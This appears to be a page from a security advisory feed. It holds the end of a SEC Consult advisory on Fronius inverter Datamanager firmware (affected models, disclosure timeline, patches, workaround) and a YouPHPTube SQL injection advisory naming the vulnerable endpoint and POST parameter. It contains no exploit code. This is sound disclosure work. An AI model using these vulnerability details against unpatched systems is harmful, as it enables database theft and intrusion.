Symo 10.0-3 480 *)
Symo 12.0-3 208-240 *)
Symo 12.5-3 480 *)
Symo 15.0-3 107 *)
Symo 15.0-3 480 *)
Symo 17.5-3 480 *)
Symo 20.0-3 480 *)
Symo 22.7-3 480 *)
Symo 24.0-3 480 *)
Eco 25.0-3-S *)
Eco 27.0-3-S *)
Symo Advanced 10.0-3 208-240 *)
Symo Advanced 12.0-3 208-240 *)
Symo Advanced 15.0-3 480 *)
Symo Advanced 20.0-3 480 *)
Symo Advanced 22.7-3 480 *)
Symo Advanced 24.0-3 480 *)
*) only with Datamanager card/box
Vendor contact timeline:
------------------------
2018-11-05: Contacting vendor through contact@fronius.com, requesting
security contact
2018-11-06: Vendor replies and confirms security issues
2018-12-03: Meeting with vendor to discuss security issues
2019-01 - 2019-11: Multiple telcos discussing Fronius' rollout plan and fixes
2019-03-18: Release of version 3.12.5 (HM 1.10.5) which fixes the path traversal vulnerability
2019-07-30: Release of version 3.14.1 (HM 1.12.1) which fixes many of the other reported issues
2019-08 - 2019-11: Testing & Fleet update to version 3.14.1 (HM 1.12.1)
2019-12-03: Coordinated release of security advisory
Solution:
---------
The vendor provides a patched firmware via their download portal. Visit
the download page and search for "firmware update" and choose the
"Fronius Solar.update Datamanager V3.14.1-10" firmware.
The new version v3.14.1 (HM 1.12.1) which contains most of the security fixes can be
downloaded directly as well:
https://www.fronius.com/~/downloads/Solar%20Energy/Firmware/SE_FW_Fronius_Solar.update_Datamanager_EN.zip
Some of the identified vulnerabilities (e.g. issue 1 and parts of 4) cannot be fixed
in the current solar inverter product/software generation. Issue 2 (path traversal)
has been fixed in version 3.12.5 (HM 1.10.5).
Workaround:
-----------
Restrict network access to the device as much as possible and disable port forwarding
from the Internet. Fronius Solar.Web access is still possible.
Advisory URL:
-------------
https://www.sec-consult.com/en/vulnerability-lab/advisories/index.html
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
SEC Consult Vulnerability Lab
SEC Consult
Europe | Asia | North America
About SEC Consult Vulnerability Lab
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It
ensures the continued knowledge gain of SEC Consult in the field of network
and application security to stay ahead of the attacker. The SEC Consult
Vulnerability Lab supports high-quality penetration testing and the evaluation
of new offensive and defensive technologies for our customers. Hence our
customers obtain the most current information about vulnerabilities and valid
recommendation about the risk profile of new technologies.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Interested to work with the experts of SEC Consult?
Send us your application https://www.sec-consult.com/en/career/index.html
Interested in improving your cyber security with the experts of SEC Consult?
Contact our local offices https://www.sec-consult.com/en/contact/index.html
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Mail: research at sec-consult dot com
Web: https://www.sec-consult.com
Blog: http://blog.sec-consult.com
Twitter: https://twitter.com/sec_consult
EOF T. Weber / @2019
↧
December 4, 2019, 3:54 pm
YouPHPTube versions 7.7 and below suffer from a remote SQL injection vulnerability in getChat.json.php.
MD5 | bda45fa0236ae4d5e784d5a3ac75112a----------------------------------------------------------------
YouPHPTube <= 7.7 (getChat.json.php) SQL Injection Vulnerability
----------------------------------------------------------------
[-] Software Link:
https://www.youphptube.com
[-] Affected Versions:
Version 7.7 and prior versions.
[-] Vulnerability Description:
User input passed through the "live_stream_code" POST parameter to
/plugin/LiveChat/getChat.json.php is not properly sanitized before
being used to construct a SQL query. This can be exploited by malicious
users to e.g. read sensitive data from the database through in-band SQL
Injection attacks. Successful exploitation of this vulnerability
requires the "Live Chat" plugin to be enabled (disabled by default).
[-] Solution:
Upgrade to version 7.8 or later.
[-] Disclosure Timeline:
[31/10/2019] - Issue reported to https://git.io/JeD2U
[02/11/2019] - CVE number assigned
[02/12/2019] - Versions 7.8 released
[04/12/2019] - Publication of this advisory
[-] CVE Reference:
The Common Vulnerabilities and Exposures project (cve.mitre.org)
has assigned the name CVE-2019-18662 to this vulnerability.
[-] Credits:
Vulnerability discovered by Egidio Romano.
[-] Original Advisory:
http://karmainsecurity.com/KIS-2019-10
↧
